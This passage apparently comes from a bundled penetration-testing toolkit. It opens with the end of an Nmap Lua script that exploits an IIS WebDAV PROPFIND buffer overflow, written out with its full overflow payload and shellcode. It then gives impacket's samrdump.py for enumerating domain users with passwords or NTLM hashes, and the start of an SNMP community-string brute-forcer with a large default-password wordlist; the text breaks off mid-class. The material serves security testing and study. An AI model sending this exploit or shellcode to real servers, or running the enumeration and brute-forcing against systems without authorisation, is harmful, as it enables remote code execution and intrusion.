 86 |   -- Crafting the request with HTTP PROPFIND method
 87 |   payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
 88 |   payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
 89 | 
 90 |   -- Random text added to payload (Can be modified only for experimental purposes)
 91 |   payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
 92 |   payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
 93 |   payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
 94 |   payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
 95 |   payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
 96 |   payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
 97 |   payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
 98 |   payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
 99 |   payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
100 |   payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
101 |   payload = payload .. '\xb3\xe3\x95\xb7'
102 | 
103 |   -- Main payload (Do not edit this part)
104 |   payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
105 |   payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
106 |   payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
107 |   payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
108 |   payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
109 |   payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
110 |   payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
111 | 
112 |   payload = payload .. '>'
113 |   payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
114 | 
115 |   -- Random text added to payload (Can be modified only for experimental purposes)
116 |   payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
117 |   payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
118 |   payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
119 |   payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
120 |   payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
121 |   payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
122 |   payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
123 |   payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
124 |   payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
125 |   payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
126 | 
127 |   -- Main payload (Do not edit this part)
128 |   payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
129 |   payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
130 |   payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
131 |   payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
132 |   payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
133 |   payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
134 |   payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
135 |   payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
136 |   payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
137 |   payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
138 |   payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
139 | 
140 |   -- Shellcode
141 |   shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
142 |   shellcode = shellcode .. 'BAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V'
143 |   shellcode = shellcode .. '3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O0'
144 |   shellcode = shellcode .. '2LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ'
145 |   shellcode = shellcode .. '2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1'
146 |   shellcode = shellcode .. 'KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
147 | 
148 |   payload = payload .. shellcode
149 |   payload = payload .. '>\r\n\r\n'
150 | 
151 |   -- Exploiting the vulnerability
152 |   try(socket:send(payload))
153 | 
154 |   -- We receive a 200 response if the payload succeeds.
155 |   response = try(socket:receive_bytes(80960))
156 |   socket:close()
157 | 
158 |   -- Checking for 200 response in the response
159 |   local regex = "HTTP/1.1 (%d+)"
160 |   local status = string.match(response, regex)
161 | 
162 |   if status == '200' then
163 |     -- Buffer overflow is successfully executed on the server.
164 |     vuln.state = vulns.STATE.EXPLOIT
165 |     vuln.exploit_results = response
166 |   elseif status == '400' then
167 |     -- Bad request error is occured because webdav is not installed.
168 |     vuln.state = vulns.STATE.LIKELY_VULN
169 |     vuln.exploit_results = "Server returned 400: Install webdav and try again."
170 |   elseif status == '502' then
171 |     -- Likely to have an error in the Server Name
172 |     vuln.state = vulns.STATE.LIKELY_VULN
173 |     vuln.exploit_results = "Server returned 502: Please try to change ServerName and run the exploit again"
174 |   elseif status ~= nil then
175 |     vuln.exploit_results = response
176 |   end
177 | 
178 |   return vuln_report:make_output(vuln)
179 | 
180 | end
181 | 
182 | 


--------------------------------------------------------------------------------
/bin/samrdump.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # Copyright (c) 2003-2015 CORE Security Technologies
  3 | #
  4 | # This software is provided under under a slightly modified version
  5 | # of the Apache Software License. See the accompanying LICENSE file
  6 | # for more information.
  7 | #
  8 | # Description: DCE/RPC SAMR dumper.
  9 | #
 10 | # Author:
 11 | #  Javier Kohen <jkohen@coresecurity.com>
 12 | #  Alberto Solino (@agsolino)
 13 | #
 14 | # Reference for:
 15 | #  DCE/RPC for SAMR
 16 | 
 17 | import sys
 18 | import logging
 19 | import argparse
 20 | 
 21 | from impacket.examples import logger
 22 | from impacket import version
 23 | from impacket.nt_errors import STATUS_MORE_ENTRIES
 24 | from impacket.dcerpc.v5 import transport, samr
 25 | from impacket.dcerpc.v5.rpcrt import DCERPCException
 26 | 
 27 | 
 28 | class ListUsersException(Exception):
 29 |     pass
 30 | 
 31 | class SAMRDump:
 32 |     KNOWN_PROTOCOLS = {
 33 |         '139/SMB': (r'ncacn_np:%s[\pipe\samr]', 139),
 34 |         '445/SMB': (r'ncacn_np:%s[\pipe\samr]', 445),
 35 |         }
 36 | 
 37 | 
 38 |     def __init__(self, protocols = None,
 39 |                  username = '', password = '', domain = '', hashes = None, aesKey=None, doKerberos = False):
 40 |         if not protocols:
 41 |             self.__protocols = SAMRDump.KNOWN_PROTOCOLS.keys()
 42 |         else:
 43 |             self.__protocols = [protocols]
 44 | 
 45 |         self.__username = username
 46 |         self.__password = password
 47 |         self.__domain = domain
 48 |         self.__lmhash = ''
 49 |         self.__nthash = ''
 50 |         self.__aesKey = aesKey
 51 |         self.__doKerberos = doKerberos
 52 |         if hashes is not None:
 53 |             self.__lmhash, self.__nthash = hashes.split(':')
 54 | 
 55 | 
 56 |     def dump(self, addr):
 57 |         """Dumps the list of users and shares registered present at
 58 |         addr. Addr is a valid host name or IP address.
 59 |         """
 60 | 
 61 |         logging.info('Retrieving endpoint list from %s' % addr)
 62 | 
 63 |         # Try all requested protocols until one works.
 64 |         entries = []
 65 |         for protocol in self.__protocols:
 66 |             protodef = SAMRDump.KNOWN_PROTOCOLS[protocol]
 67 |             port = protodef[1]
 68 | 
 69 |             logging.info("Trying protocol %s..." % protocol)
 70 |             rpctransport = transport.SMBTransport(addr, port, r'\samr', self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, doKerberos = self.__doKerberos)
 71 | 
 72 |             try:
 73 |                 entries = self.__fetchList(rpctransport)
 74 |             except Exception, e:
 75 |                 logging.critical(str(e))
 76 |             else:
 77 |                 # Got a response. No need for further iterations.
 78 |                 break
 79 | 
 80 |         # Display results.
 81 | 
 82 |         for entry in entries:
 83 |             (username, uid, user) = entry
 84 |             base = "%s (%d)" % (username, uid)
 85 |             print base + '/FullName:', user['FullName']
 86 |             print base + '/UserComment:', user['UserComment']
 87 |             print base + '/PrimaryGroupId:', user['PrimaryGroupId']
 88 |             print base + '/BadPasswordCount:', user['BadPasswordCount']
 89 |             print base + '/LogonCount:', user['LogonCount']
 90 | 
 91 |         if entries:
 92 |             num = len(entries)
 93 |             if 1 == num:
 94 |                 logging.info('Received one entry.')
 95 |             else:
 96 |                 logging.info('Received %d entries.' % num)
 97 |         else:
 98 |             logging.info('No entries received.')
 99 | 
100 | 
101 |     def __fetchList(self, rpctransport):
102 |         dce = rpctransport.get_dce_rpc()
103 | 
104 |         entries = []
105 | 
106 |         dce.connect()
107 |         dce.bind(samr.MSRPC_UUID_SAMR)
108 | 
109 |         try:
110 |             resp = samr.hSamrConnect(dce)
111 |             serverHandle = resp['ServerHandle'] 
112 | 
113 |             resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
114 |             domains = resp['Buffer']['Buffer']
115 | 
116 |             print 'Found domain(s):'
117 |             for domain in domains:
118 |                 print " . %s" % domain['Name']
119 | 
120 |             logging.info("Looking up users in domain %s" % domains[0]['Name'])
121 | 
122 |             resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
123 | 
124 |             resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
125 |             domainHandle = resp['DomainHandle']
126 | 
127 |             status = STATUS_MORE_ENTRIES
128 |             enumerationContext = 0
129 |             while status == STATUS_MORE_ENTRIES:
130 |                 try:
131 |                     resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext = enumerationContext)
132 |                 except DCERPCException, e:
133 |                     if str(e).find('STATUS_MORE_ENTRIES') < 0:
134 |                         raise 
135 |                     resp = e.get_packet()
136 | 
137 |                 for user in resp['Buffer']['Buffer']:
138 |                     r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user['RelativeId'])
139 |                     print "Found user: %s, uid = %d" % (user['Name'], user['RelativeId'] )
140 |                     info = samr.hSamrQueryInformationUser2(dce, r['UserHandle'],samr.USER_INFORMATION_CLASS.UserAllInformation)
141 |                     entry = (user['Name'], user['RelativeId'], info['Buffer']['All'])
142 |                     entries.append(entry)
143 |                     samr.hSamrCloseHandle(dce, r['UserHandle'])
144 | 
145 |                 enumerationContext = resp['EnumerationContext'] 
146 |                 status = resp['ErrorCode']
147 | 
148 |         except ListUsersException, e:
149 |             logging.critical("Error listing users: %s" % e)
150 | 
151 |         dce.disconnect()
152 | 
153 |         return entries
154 | 
155 | 
156 | # Process command-line arguments.
157 | if __name__ == '__main__':
158 |     # Init the example's logger theme
159 |     logger.init()
160 |     print version.BANNER
161 | 
162 |     parser = argparse.ArgumentParser(add_help = True, description = "This script downloads the list of users for the target system.")
163 | 
164 |     parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
165 |     parser.add_argument('protocol', choices=SAMRDump.KNOWN_PROTOCOLS.keys(), nargs='?', default='445/SMB', help='transport protocol (default 445/SMB)')
166 |     parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
167 | 
168 |     group = parser.add_argument_group('authentication')
169 | 
170 |     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
171 |     group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
172 |     group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
173 |     group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
174 | 
175 |     if len(sys.argv)==1:
176 |         parser.print_help()
177 |         sys.exit(1)
178 | 
179 |     options = parser.parse_args()
180 | 
181 |     if options.debug is True:
182 |         logging.getLogger().setLevel(logging.DEBUG)
183 |     else:
184 |         logging.getLogger().setLevel(logging.INFO)
185 | 
186 |     import re
187 | 
188 |     domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
189 | 
190 |     if domain is None:
191 |         domain = ''
192 | 
193 |     if options.aesKey is not None:
194 |         options.k = True
195 | 
196 |     if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
197 |         from getpass import getpass
198 |         password = getpass("Password:")
199 | 
200 |     dumper = SAMRDump(options.protocol, username, password, domain, options.hashes, options.aesKey, options.k)
201 |     dumper.dump(address)
202 | 


--------------------------------------------------------------------------------
/bin/snmpbrute.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # SNMP Bruteforce & Enumeration Script
  3 | # Requires metasploit, snmpwalk, snmpstat and john the ripper
  4 | __version__ = 'v1.0b'
  5 | from socket import socket, SOCK_DGRAM, AF_INET, timeout
  6 | from random import randint
  7 | from time import sleep
  8 | import optparse, sys, os
  9 | from subprocess import Popen, PIPE
 10 | import struct
 11 | import threading, thread
 12 | import tempfile
 13 | 
 14 | from scapy.all import (SNMP, SNMPnext, SNMPvarbind, ASN1_OID, SNMPget, ASN1_DECODING_ERROR, ASN1_NULL, ASN1_IPADDRESS,
 15 |                        SNMPset, SNMPbulk, IP)
 16 | 
 17 | ##########################################################################################################
 18 | #	Defaults
 19 | ##########################################################################################################
 20 | class defaults:
 21 | 	rate=30.0
 22 | 	timeOut=2.0
 23 | 	port=161
 24 | 	delay=2
 25 | 	interactive=True
 26 | 	verbose=False
 27 | 	getcisco=True
 28 | 	colour=True
 29 | 
 30 | default_communities=['','0','0392a0','1234','2read','3com','3Com','3COM','4changes','access','adm','admin','Admin','administrator','agent','agent_steal','all','all private','all public','anycom','ANYCOM','apc','bintec','blue','boss','c','C0de','cable-d','cable_docsispublic@es0','cacti','canon_admin','cascade','cc','changeme','cisco','CISCO','cmaker','comcomcom','community','core','CR52401','crest','debug','default','demo','dilbert','enable','entry','field','field-service','freekevin','friend','fubar','guest','hello','hideit','host','hp_admin','ibm','IBM','ilmi','ILMI','intel','Intel','intermec','Intermec','internal','internet','ios','isdn','l2','l3','lan','liteon','login','logon','lucenttech','lucenttech1','lucenttech2','manager','master','microsoft','mngr','mngt','monitor','mrtg','nagios','net','netman','network','nobody','NoGaH$@!','none','notsopublic','nt','ntopia','openview','operator','OrigEquipMfr','ourCommStr','pass','passcode','password','PASSWORD','pr1v4t3','pr1vat3','private',' private','private ','Private','PRIVATE','private@es0','Private@es0','private@es1','Private@es1','proxy','publ1c','public',' public','public ','Public','PUBLIC','public@es0','public@es1','public/RO','read','read-only','readwrite','read-write','red','regional','<removed>','rmon','rmon_admin','ro','root','router','rw','rwa','sanfran','san-fran','scotty','secret','Secret','SECRET','Secret C0de','security','Security','SECURITY','seri','server','snmp','SNMP','snmpd','snmptrap','snmp-Trap','SNMP_trap','SNMPv1/v2c','SNMPv2c','solaris','solarwinds','sun','SUN','superuser','supervisor','support','switch','Switch','SWITCH','sysadm','sysop','Sysop','system','System','SYSTEM','tech','telnet','TENmanUFactOryPOWER','test','TEST','test2','tiv0li','tivoli','topsecret','traffic','trap','user','vterm1','watch','watchit','windows','windowsnt','workstation','world','write','writeit','xyzzy','yellow','ILMI']
 31 | 
 32 | ##########################################################################################################
 33 | #	OID's
 34 | ##########################################################################################################
 35 | ''' Credits
 36 | Some OID's borowed from Cisc0wn script
 37 | # Cisc0wn - The Cisco SNMP 0wner.
 38 | # Daniel Compton
 39 | # www.commonexploits.com
 40 | # contact@commexploits.com
 41 | '''
 42 | 
 43 | RouteOIDS={
 44 | 	'ROUTDESTOID':	[".1.3.6.1.2.1.4.21.1.1", "Destination"],
 45 | 	'ROUTHOPOID':	[".1.3.6.1.2.1.4.21.1.7", "Next Hop"],
 46 | 	'ROUTMASKOID':	[".1.3.6.1.2.1.4.21.1.11", "Mask"],
 47 | 	'ROUTMETOID':	[".1.3.6.1.2.1.4.21.1.3", "Metric"],
 48 | 	'ROUTINTOID':	[".1.3.6.1.2.1.4.21.1.2", "Interface"],
 49 | 	'ROUTTYPOID':	[".1.3.6.1.2.1.4.21.1.8", "Route type"],
 50 | 	'ROUTPROTOID':	[".1.3.6.1.2.1.4.21.1.9", "Route protocol"],
 51 | 	'ROUTAGEOID':	[".1.3.6.1.2.1.4.21.1.10", "Route age"]
 52 | }
 53 | 
 54 | InterfaceOIDS={
 55 | 	#Interface Info
 56 | 	'INTLISTOID':	[".1.3.6.1.2.1.2.2.1.2", "Interfaces"],
 57 | 	'INTIPLISTOID':	[".1.3.6.1.2.1.4.20.1.1", "IP address"],
 58 | 	'INTIPMASKOID':	[".1.3.6.1.2.1.4.20.1.3", "Subnet mask"],
 59 | 	'INTSTATUSLISTOID':[".1.3.6.1.2.1.2.2.1.8", "Status"]
 60 | }
 61 | 
 62 | ARPOIDS={
 63 | 	# Arp table
 64 | 	'ARPADDR':		[".1.3.6.1.2.1.3.1 ","ARP address method A"],
 65 | 	'ARPADDR2':		[".1.3.6.1.2.1.3.1 ","ARP address method B"]
 66 | }
 67 | 
 68 | OIDS={
 69 | 	'SYSTEM':["iso.3.6.1.2.1.1 ","SYSTEM Info"]
 70 | }
 71 | 
 72 | snmpstat_args={
 73 | 	'Interfaces':["-Ci","Interface Info"],
 74 | 	'Routing':["-Cr","Route Info"],
 75 | 	'Netstat':["","Netstat"],
 76 | 	#'Statistics':["-Cs","Stats"]
 77 | }
 78 | 
 79 | '''Credits
 80 | The following OID's are borrowed from snmpenum.pl script
 81 | #        ----by filip waeytens 2003----
 82 | #        ----  DA SCANIT CREW www.scanit.be ----
 83 | #         filip.waeytens@hushmail.com
 84 | '''
 85 | 
 86 | WINDOWS_OIDS={
 87 | 	'RUNNING PROCESSES':	["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
 88 | 	'INSTALLED SOFTWARE':	["1.3.6.1.2.1.25.6.3.1.2","Installed Software"],
 89 | 	'SYSTEM INFO':	["1.3.6.1.2.1.1","System Info"],
 90 | 	'HOSTNAME':	["1.3.6.1.2.1.1.5","Hostname"],
 91 | 	'DOMAIN':	["1.3.6.1.4.1.77.1.4.1","Domain"],
 92 | 	'USERS':	["1.3.6.1.4.1.77.1.2.25","Users"],
 93 | 	'UPTIME':	["1.3.6.1.2.1.1.3","UpTime"],
 94 | 	'SHARES':	["1.3.6.1.4.1.77.1.2.27","Shares"],
 95 | 	'DISKS':	["1.3.6.1.2.1.25.2.3.1.3","Disks"],
 96 | 	'SERVICES':	["1.3.6.1.4.1.77.1.2.3.1.1","Services"],
 97 | 	'LISTENING TCP PORTS':	["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"],
 98 | 	'LISTENING UDP PORTS':	["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"]
 99 | }
100 | 
101 | LINUX_OIDS={
102 | 	'RUNNING PROCESSES':	["1.3.6.1.2.1.25.4.2.1.2","Running Processes"],
103 | 	'SYSTEM INFO':	["1.3.6.1.2.1.1","System Info"],
104 | 	'HOSTNAME':	["1.3.6.1.2.1.1.5","Hostname"],
105 | 	'UPTIME':	["1.3.6.1.2.1.1.3","UpTime"],
106 | 	'MOUNTPOINTS':	["1.3.6.1.2.1.25.2.3.1.3","MountPoints"],
107 | 	'RUNNING SOFTWARE PATHS':	["1.3.6.1.2.1.25.4.2.1.4","Running Software Paths"],
108 | 	'LISTENING UDP PORTS':	["1.3.6.1.2.1.7.5.1.2.0.0.0.0","Listening UDP Ports"],
109 | 	'LISTENING TCP PORTS':	["1.3.6.1.2.1.6.13.1.3.0.0.0.0","Listening TCP Ports"]
110 | }
111 | 
112 | CISCO_OIDS={
113 | 	'LAST TERMINAL USERS':	["1.3.6.1.4.1.9.9.43.1.1.6.1.8","Last Terminal User"],
114 | 	'INTERFACES':	["1.3.6.1.2.1.2.2.1.2","Interfaces"],
115 | 	'SYSTEM INFO':	["1.3.6.1.2.1.1.1","System Info"],
116 | 	'HOSTNAME':	["1.3.6.1.2.1.1.5","Hostname"],
117 | 	'SNMP Communities':	["1.3.6.1.6.3.12.1.3.1.4","Communities"],
118 | 	'UPTIME':	["1.3.6.1.2.1.1.3","UpTime"],
119 | 	'IP ADDRESSES':	["1.3.6.1.2.1.4.20.1.1","IP Addresses"],
120 | 	'INTERFACE DESCRIPTIONS':	["1.3.6.1.2.1.31.1.1.1.18","Interface Descriptions"],
121 | 	'HARDWARE':	["1.3.6.1.2.1.47.1.1.1.1.2","Hardware"],
122 | 	'TACACS SERVER':	["1.3.6.1.4.1.9.2.1.5","TACACS Server"],
123 | 	'LOG MESSAGES':	["1.3.6.1.4.1.9.9.41.1.2.3.1.5","Log Messages"],
124 | 	'PROCESSES':	["1.3.6.1.4.1.9.9.109.1.2.1.1.2","Processes"],
125 | 	'SNMP TRAP SERVER':	["1.3.6.1.6.3.12.1.2.1.7","SNMP Trap Server"]
126 | }
127 | 
128 | ##########################################################################################################
129 | #	Classes
130 | ##########################################################################################################
131 | 
132 | class SNMPError(Exception):
133 | 	'''Credits
134 | 	Class copied from sploitego project
135 | 	__original_author__ = 'Nadeem Douba'
136 | 	https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
137 | 	'''
138 | 	pass
139 | 
140 | class SNMPVersion:
141 | 	'''Credits
142 | 	Class copied from sploitego project
143 | 	__original_author__ = 'Nadeem Douba'
144 | 	https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
145 | 	'''
146 | 	v1 = 0
147 | 	v2c = 1
148 | 	v3 = 2
149 | 
150 | 	@classmethod
151 | 	def iversion(cls, v):
152 | 		if v in ['v1', '1']:
153 | 			return cls.v1
154 | 		elif v in ['v2', '2', 'v2c']:
155 | 			return cls.v2c
156 | 		elif v in ['v3', '3']:
157 | 			return cls.v3
158 | 		raise ValueError('No such version %s' % v)
159 | 
160 | 	@classmethod
161 | 	def sversion(cls, v):
162 | 		if not v:
163 | 			return 'v1'
164 | 		elif v == 1:
165 | 			return 'v2c'
166 | 		elif v == 2:
167 | 			return 'v3'
168 | 		raise ValueError('No such version number %s' % v)
169 | 
170 | class SNMPBruteForcer(object):
171 | 	#This class is used for the sploitego method of bruteforce (--sploitego)
172 | 	'''Credits
173 | 	Class copied from sploitego project
174 | 	__original_author__ = 'Nadeem Douba'
175 | 	https://github.com/allfro/sploitego/blob/master/src/sploitego/scapytools/snmp.py
176 | 	'''
177 | 	def __init__(self, agent, port=161, version='v2c', timeout=0.5, rate=1000):
178 | 		self.version = SNMPVersion.iversion(version)
179 | 		self.s = socket(AF_INET, SOCK_DGRAM)
180 | 		self.s.settimeout(timeout)
181 | 		self.addr = (agent, port)
182 | 		self.rate = rate
183 | 
184 | 	def guess(self, communities):
185 | 
186 | 		p = SNMP(
187 | 			version=self.version,
188 | 			PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1.0'))])
189 | 		)
190 | 		r = []
191 | 		for c in communities:
192 | 			i = randint(0, 2147483647)
193 | 			p.PDU.id = i
194 | 			p.community = c
195 | 			self.s.sendto(str(p), self.addr)
196 | 			sleep(1/self.rate)
197 | 		while True:
198 | 			try:
199 | 				p = SNMP(self.s.recvfrom(65535)[0])
200 | 			except timeout:
201 | 				break
202 | 			r.append(p.community.val)
203 | 		return r
204 | 
205 | 	def __del__(self):
206 | 		self.s.close()
207 | 
208 | class SNMPResults:
209 | 	addr=''
210 | 	version=''
211 | 	community=''
212 | 	write=False
213 | 
214 | 	def __eq__(self, other):
